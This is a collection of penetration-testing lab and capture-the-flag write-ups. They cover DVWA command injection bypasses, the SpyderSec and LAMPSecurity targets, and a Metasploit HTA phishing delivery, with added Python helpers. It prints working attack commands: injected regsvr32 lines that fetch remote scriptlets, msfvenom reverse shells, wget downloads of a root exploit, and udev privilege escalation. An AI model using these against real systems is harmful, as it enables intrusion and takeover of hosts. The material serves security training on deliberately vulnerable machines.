Command injection is an attack whose goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection is possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. The attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection is possible largely because of insufficient input validation.
This attack differs from code injection: code injection lets the attacker supply code that the application itself then executes, extending the application's default functionality without necessarily running system commands, whereas command injection gets the host shell to run attacker-chosen commands.
First install DVWA on your machine (the installation is covered in a separate article).
Now open DVWA in your browser and log in with your DVWA credentials.
Bypass Low Level Security
Click on DVWA Security and set the Website Security Level to low.
Use the & operator in command injection to bypass the low security level of this server.
Go to the Command Execution page, enter an IP address (192.168.1.100 in this lab) and click Submit. The page returns the ping reply, which tells us the application hands our input to a system command (ping) and shows us its output. I have tried this numerous times just to be sure, and so can you: whenever you execute this command you will see the same result.
We can also run multiple commands in one submission by chaining them with the & sign. On the Windows cmd.exe used here, a single & runs the second command unconditionally, while && runs it only if the first command succeeded, which in this case means ping got a reply. For example, the next command is:
192.168.1.100 && dir
Click Submit; the injected dir runs on the server and lists the files and directories of the application's folder together with its path (in this lab, four directories and one file).
The next command is 192.168.1.100 && net user; click Submit and the local user accounts of the Windows host are listed.
Various commands are available and each, when submitted, gives the intended result. So first we need a way to transfer our payload to the remote machine, and for that I use my favourite tool, Metasploit. Type msfconsole in the Kali terminal and then enter the following commands:
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.106
msf exploit(regsvr32_applocker_bypass_server) > set lport 4444
msf exploit(regsvr32_applocker_bypass_server) > exploit
The module starts a web server that hosts a .sct scriptlet and prints the regsvr32 command to run on the target. Injecting that command makes the target fetch the scriptlet over HTTP and execute it through scrobj.dll; regsvr32 is a signed Microsoft binary, which is why this gets past AppLocker rules that only allow trusted executables. The scriptlet launches the Meterpreter payload, which connects back to our handler. Use the URL the module prints when it starts (in this run the scriptlet was served from 192.168.1.103 on port 8080):
192.168.1.100 && regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
Click Submit and a Meterpreter session opens. Run sysinfo to get the system information.
Bypass Medium Level Security
Click on DVWA Security and set the Website Security Level to Medium.
At this level the application strips the && and ; sequences from the input, so use a pipe instead: cmd.exe runs the command after | regardless of what ping does, and a single | is not filtered.
Follow the same process as above with Metasploit and then submit:
192.168.1.100 | regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
Again we get a Meterpreter session (session 2).
Bypass High Level Security
Click on DVWA Security and set the Website Security Level to High.
The high level also strips a lone &, a pipe followed by a space and several other characters, but in recent DVWA versions the substitution for "| " is applied before the one for "||", so an input containing "|| " is collapsed to a single bare pipe and still reaches the shell. Follow the same process as above with Metasploit and submit:
192.168.1.100 || regsvr32 /s /n /u /i:http://192.168.1.103:8080/C99PdFH.sct scrobj.dll
Click Submit, and yes, we get Meterpreter session 3.
Finally we have completed all three levels, low, medium and high, in DVWA.
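To make the three bypasses concrete, here is an added Python model of what the Command Execution page does with the input at each security level, alongside the hardened version a developer should ship. This is example code written for this page, not DVWA's PHP and not part of the original post; the two blocklists reproduce my reading of the DVWA source and are an assumption about its exact contents, and the bare "ping " prefix mirrors the Windows host used in this lab.

```python
import ipaddress
import os
import re
import subprocess

# Assumption: these lists reproduce the DVWA medium/high blocklists from
# memory of its source. PHP's str_replace() applies them in order, and that
# ordering is exactly what the high-level "||" bypass relies on.
MEDIUM_SUBSTITUTIONS = [("&&", ""), (";", "")]
HIGH_SUBSTITUTIONS = [("&", ""), (";", ""), ("| ", ""), ("-", ""), ("$", ""),
                      ("(", ""), (")", ""), ("`", ""), ("||", "")]

# Control operators that both cmd.exe and sh honour inside a command string.
OPERATOR_RE = re.compile(r"\s*(\|\||&&|[|;&])\s*")


def apply_blocklist(user_input, substitutions):
    """Apply each substitution in sequence, as str_replace() would."""
    for bad, replacement in substitutions:
        user_input = user_input.replace(bad, replacement)
    return user_input


def vulnerable_command(user_input, level):
    """Return the string a DVWA-style handler would pass to shell_exec().

    level is "low", "medium" or "high". Nothing is executed here; the string
    is returned so we can inspect what the shell would have received.
    """
    if level == "medium":
        user_input = apply_blocklist(user_input, MEDIUM_SUBSTITUTIONS)
    elif level == "high":
        user_input = apply_blocklist(user_input, HIGH_SUBSTITUTIONS).strip()
    return "ping " + user_input          # Windows ping, as on the lab target


def extra_commands(cmdline):
    """Everything the shell would run after the first control operator."""
    parts = OPERATOR_RE.split(cmdline)   # [cmd, op, cmd, op, cmd, ...]
    return [p for p in parts[2::2] if p]


def safe_ping_argv(user_input):
    """Hardened version: validate strictly, then build an argv list.

    Passing a list to subprocess.run() without shell=True means no shell ever
    parses the value, so &, |, ; and friends are just bytes in an argument.
    Anything that is not an IP address is rejected before anything runs.
    """
    try:
        ip = ipaddress.ip_address(user_input.strip())
    except ValueError:
        raise ValueError("rejected target: %r is not an IP address" % user_input)
    count_flag = "-n" if os.name == "nt" else "-c"
    return ["ping", count_flag, "4", str(ip)]


def run_safe_ping(user_input):
    """Execute the validated command with no shell and a timeout."""
    argv = safe_ping_argv(user_input)
    return subprocess.run(argv, capture_output=True, text=True, timeout=15)


if __name__ == "__main__":
    for level, payload in [("low", "192.168.1.100 && dir"),
                           ("medium", "192.168.1.100 && dir"),
                           ("medium", "192.168.1.100 | dir"),
                           ("high", "192.168.1.100 || dir")]:
        cmd = vulnerable_command(payload, level)
        print("%-6s %-45r -> extra commands: %s" % (level, cmd, extra_commands(cmd)))
```

Running the script shows the medium filter turning "192.168.1.100 && dir" into a harmless extra ping argument while "192.168.1.100 | dir" passes untouched, and the high filter reducing "192.168.1.100 || dir" to "192.168.1.100 |dir". The fix is not a longer blocklist: safe_ping_argv() accepts only something ipaddress can parse and hands the shell nothing at all.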
Metasploit's hta_server module is another payload delivery option for Windows targets. This module hosts an HTML Application (HTA) that, when opened, runs a payload via PowerShell. When a user navigates to the HTA file they are prompted by Internet Explorer twice before the payload is executed.
Exploit Targets
Windows, all versions
Requirements
Attacker: Kali Linux
Victim PC: Windows 10
Open a Kali terminal, type msfconsole and enter:
use exploit/windows/misc/hta_server
msf exploit(hta_server) > set lhost 192.168.0.104
msf exploit(hta_server) > set srvhost 192.168.0.104
msf exploit(hta_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(hta_server) > set lport 8443
msf exploit(hta_server) > exploit
Send the server link to the victim via chat, email or any other social engineering technique.
When the victim browses to the link, an .hta file is downloaded; when the victim opens it (and accepts the two IE prompts) you get a Meterpreter session.
List the sessions with sessions -l and interact with one using sessions -i <ID>.
Challenge: You are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file) which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.
You can download it from here: https://www.vulnhub.com/entry/spydersec-challenge,128/
Level: Intermediate
Penetration testing methodology:
- Network scanning (netdiscover, nmap)
- Extracting metadata (ExifTool)
- Decoding hex to ASCII and base64
- Unpacking the obfuscated JavaScript eval() function
- Capturing the HTTP request (Burp Suite)
- Decoding the URI to get the mulder.fbi file
- Unlocking the hidden drive (VeraCrypt)
- Capturing the flag
netdiscover
Our target is 192.168.1.101. Scan the target with nmap:
nmap -A 192.168.1.101
Only two ports are open: 22 (SSH) and 80 (HTTP). Next, I opened the web page in a browser.
The page contains an image, Challenge.png; download it and inspect its metadata:
exiftool Challenge.png
If you look closely, the Comment field is a hexadecimal string, so we need to convert it to readable form. Any hex-to-ASCII converter will do: paste the string in and convert it.
The result is base64-encoded text; decode it with the following command:
echo 'base64 text' | base64 -d
Now we finally have a readable string. It could be a password or a directory name, so note it down for later.
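Peeling these layers by hand works, but when a CTF stacks several encodings it is easier to let a small script detect and strip them. This is an added Python example and not part of the original write-up: the sample comment is constructed here (a made-up secret, base64-encoded and then hex-encoded) and stands in for the real EXIF comment, whose contents are not reproduced.

```python
import base64
import binascii
import re
import string

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed sample: a made-up secret, base64-encoded, then hex-encoded. It
# mirrors the two layers found in the image comment; it is not the real flag.
SAMPLE_SECRET = "demo-password-123"
SAMPLE_COMMENT = base64.b64encode(SAMPLE_SECRET.encode()).hex()


def is_printable(data):
    """True if the bytes decode to ASCII text a human would want to read."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return all(c in string.printable for c in text)


def decode_one_layer(text):
    """Try hex, then base64; return (kind, decoded_text) or None if neither fits.

    The printable check is what stops us from "decoding" a plain word that
    merely happens to look like hex or base64.
    """
    if HEX_RE.match(text) and len(text) % 2 == 0:
        decoded = bytes.fromhex(text)
        if is_printable(decoded):
            return "hex", decoded.decode("ascii")
    if B64_RE.match(text) and len(text) % 4 == 0:
        try:
            decoded = base64.b64decode(text, validate=True)
        except binascii.Error:
            return None
        if is_printable(decoded):
            return "base64", decoded.decode("ascii")
    return None


def peel(text, max_layers=8):
    """Strip encoding layers until plain text remains; return (layers, text)."""
    layers = []
    current = text.strip()
    for _ in range(max_layers):
        step = decode_one_layer(current)
        if step is None:
            break
        kind, current = step
        layers.append(kind)
    return layers, current


if __name__ == "__main__":
    print("comment:", SAMPLE_COMMENT)
    print("peeled :", peel(SAMPLE_COMMENT))
```

Feed it the string from the Comment field and it reports which layers it removed and the final text; a result of no layers means the value is already plain (or uses an encoding the script does not know), which is your cue to look at it by hand.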
Moving on, if you go through the source code of the home page you will find an eval() function that is quite unusual (packed JavaScript).
After unpacking it you will again come face to face with a hexadecimal string. Convert it just like before.
I explored and searched a lot but found nothing more about it, so I decided to capture the site's cookies with Burp Suite.
When I opened the decoded URI there was an error. I explored a bit more, remembered that there was a mulder.fbi, and appended that to the link.
After adding mulder.fbi to the link it offered a file to download. Save it.
Opening the saved file plays a video with various quotes. I was clueless about this, so I searched on Google and found that it was a TrueCrypt container hidden inside the video. To see what is hidden, run:
python tcsteg.py mulder.fbi
There is a whole drive hidden behind it, and with VeraCrypt you can mount and open it.
When you open it, it asks for a password, and we found the password earlier, so enter it there.
The drive is unlocked. Open it and you will find the flag.
The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises too.
These exercises can be used for training purposes by following this documentation. Alternatively, you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.
Download from Here.
Penetration Testing Methodology
- Network Scanning
  - netdiscover
  - nmap port scan
- Enumeration
  - Directory brute force
  - Exploring directories to find the username and password
- Exploiting
  - Uploading a backdoor
  - Catching the session with netcat/msfconsole
- Privilege Escalation
  - udev local exploit
  - Changing the password of root and other users
Network Scanning
The first step of the attack is to identify the target. To do that we use the following command:
netdiscover
Now we use nmap to find the open ports and the services running on the target machine:
nmap -sV -sT -p- 192.168.43.30
Enumeration
Open http://192.168.43.30 in the browser, then brute-force directories:
dirb http://192.168.43.30
We found two interesting directories, /files/ and /sql/; their names alone suggest they matter.
Browsing http://192.168.43.30/files/ shows several valid and useful files with a lot of information, as you can see in the image below.
Under http://192.168.43.30/sql/ there is a db.sql; opening it gives us the whole database dump, including a username and password, as shown in the image below.
Since the application lets us add a new event and attach a file to it, we first create a PHP backdoor with msfvenom and then upload shell.php through that form. To create the shell:
msfvenom -p php/meterpreter/reverse_tcp -o /root/Music/shell.php lport=4444 lhost=192.168.43.248
After this, upload the shell by adding a new event as shown in the image below.
Now that the malicious file is uploaded, start a handler in msfconsole (netcat works too for a plain reverse shell) to catch the session and continue towards root:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.248
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit
sysinfo
The kernel version is 2.6.18-92.el5.
Searching for this kernel version shows that this CentOS 5 release ships an old udev that is vulnerable to the udev netlink local privilege escalation (udev before 141, CVE-2009-1185).
We will use the public exploit script 8478.sh (Exploit-DB entry 8478) to gain root; it ships in Kali's exploitdb package:
cp /usr/share/exploitdb/exploits/linux/local/8478.sh /root/Music
cd /root/Music/
ls -l
Serve it over HTTP from that directory:
python -m SimpleHTTPServer
Back in the Meterpreter session (sysinfo confirms we are on the target), open a shell on the target and upgrade it to an interactive TTY, then move to a writable directory:
sysinfo
python -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp
pwd
Now download 8478.sh onto the target with wget so that we can run it there:
wget http://192.168.43.248:8000/8478.sh -q
Make it executable with chmod and run it:
ls
chmod +x 8478.sh
./8478.sh
Many of us will get an error at this point, typically "bad interpreter": the script has Windows CRLF line endings, so the shebang line is read as /bin/bash followed by a carriage return and the kernel cannot find that interpreter. Strip the carriage returns with sed:
sed -i -e 's/\r$//' 8478.sh
Try running the script again:
./8478.sh
This time the script complains because it needs an argument: the PID of udevd's netlink socket, which takes some experimentation to find. The candidates are listed in /proc/net/netlink (the Pid column of the socket on netlink protocol 15, the kernel uevent family that udev listens on). To see them run:
cat /proc/net/netlink
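Rather than eyeballing /proc/net/netlink, you can pick the argument out programmatically. This is an added Python example, not part of the original write-up: it fixes the CRLF problem from the previous step and then parses a constructed /proc/net/netlink listing (laid out like the real file on a 2.6 kernel, with a made-up port id of 376) to find the netlink port id of udevd's socket, which is the "PID" the exploit wants; that port id is not necessarily the process id ps shows for udevd. NETLINK_KOBJECT_UEVENT is protocol 15 in the kernel headers.

```python
import os

NETLINK_KOBJECT_UEVENT = 15   # linux/netlink.h: udevd listens on this family

# Constructed sample in the layout of /proc/net/netlink on a 2.6 kernel:
# sk (kernel address), Eth (netlink protocol), Pid (port id), Groups, ...
# Pid 0 rows are kernel-side sockets; the non-zero Pid on protocol 15 is the
# udevd listener. The value 376 is made up for this example.
SAMPLE_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
c1b08c00 0   0      00000000 0        0        00000000 2
c1b08800 7   0      00000000 0        0        00000000 2
c1b08400 15  0      00000000 0        0        00000000 2
c1b08000 15  376    ffffffff 0        0        00000000 2
c1b07c00 9   0      00000000 0        0        00000000 2
"""


def fix_crlf(script_bytes):
    """Return (fixed_bytes, changed).

    A script with CRLF endings has a shebang of '#!/bin/bash' followed by a
    carriage return, which the kernel treats as a missing interpreter.
    """
    fixed = script_bytes.replace(b"\r\n", b"\n")
    return fixed, fixed != script_bytes


def uevent_socket_pids(netlink_text):
    """Port ids (the Pid column) of user-space NETLINK_KOBJECT_UEVENT sockets."""
    pids = []
    for line in netlink_text.splitlines()[1:]:   # skip the header row
        fields = line.split()
        if len(fields) < 3:
            continue
        try:
            proto, pid = int(fields[1]), int(fields[2])
        except ValueError:
            continue
        if proto == NETLINK_KOBJECT_UEVENT and pid != 0:
            pids.append(pid)
    return pids


def live_udev_pid():
    """Read the real /proc/net/netlink; None if absent or without a candidate."""
    if not os.path.exists("/proc/net/netlink"):
        return None
    with open("/proc/net/netlink") as fh:
        pids = uevent_socket_pids(fh.read())
    return pids[0] if pids else None


def prepare_script(path):
    """Rewrite the exploit script in place if it has CRLF endings; return True if changed."""
    with open(path, "rb") as fh:
        data = fh.read()
    fixed, changed = fix_crlf(data)
    if changed:
        with open(path, "wb") as fh:
            fh.write(fixed)
    return changed


if __name__ == "__main__":
    print("sample  :", uevent_socket_pids(SAMPLE_NETLINK))
    print("this host:", live_udev_pid())
```

On the target, prepare_script("8478.sh") replaces the sed step and live_udev_pid() prints the value to pass as the first argument; if it returns more than one candidate, try each in turn, which is the experimentation the exploit's own instructions warn about.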
Run the script again with PID 376 and check who we are:
./8478.sh 376
whoami
Boom! We have gained root access.
With root we set a new password for root, confirm our identity with id, switch to the user john, come back to a root login shell with su -l and list the directory:
passwd root
id
su john
su -l
ls
Changing root's password is fine in a CTF, but on a real engagement it is destructive and easily noticed; prefer a less intrusive way of keeping access and record every change you make.